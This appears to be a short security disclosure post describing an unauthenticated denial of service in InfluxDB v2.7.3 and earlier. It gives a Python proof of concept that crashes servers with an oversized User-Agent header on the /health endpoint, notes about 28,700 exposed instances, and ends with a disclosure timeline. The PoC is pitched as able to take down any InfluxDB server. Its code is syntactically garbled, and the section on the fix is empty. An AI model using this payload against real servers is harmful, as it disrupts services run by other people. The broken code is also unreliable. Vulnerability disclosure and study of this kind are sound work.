InfluxDB - Unauthenticated Remote DoS (CVE-XXXX-XXXX)


InfluxDB is described as a "Scalable datastore for metrics, events, and real-time analytics". I Was looking through InfluxDB and discovered an unauthenticated remote DoS that effects v2.7.3 and before. Here is the sample code to DoS any InfluxDB server, Shodan clocks in about ~28700 instances right now.

Proof of Concept

import requests
import time

URL = "localhost"
PORT = "8086"

response = requests.get(
    URL + ":"+ PORT + "/health",
    headers = {"User-Agent":"A"* 1052334}

    response2 = requests.get(
    URL + ":"+ PORT + "/health",
    if response2.status_code=200:
        print ("Didn't go down, probably a docker container.")
except requests.exception.RequestException as e:
    print ("Looks like it was successful")

Diving deeper into this, the only condition that this exploit relies on is the metrics Scraper must be working properly. The way InfluxDB parses the HTTP request causing it to crash with a panic due to the size in the scraper.


The fix in metrics.go


Nov 7. 2023 - Maintainers contacted
Nov 8. 2023 - Remediation pushed to v2.7.4
Nov 9. 2023 - Maintainers ACK'd security issue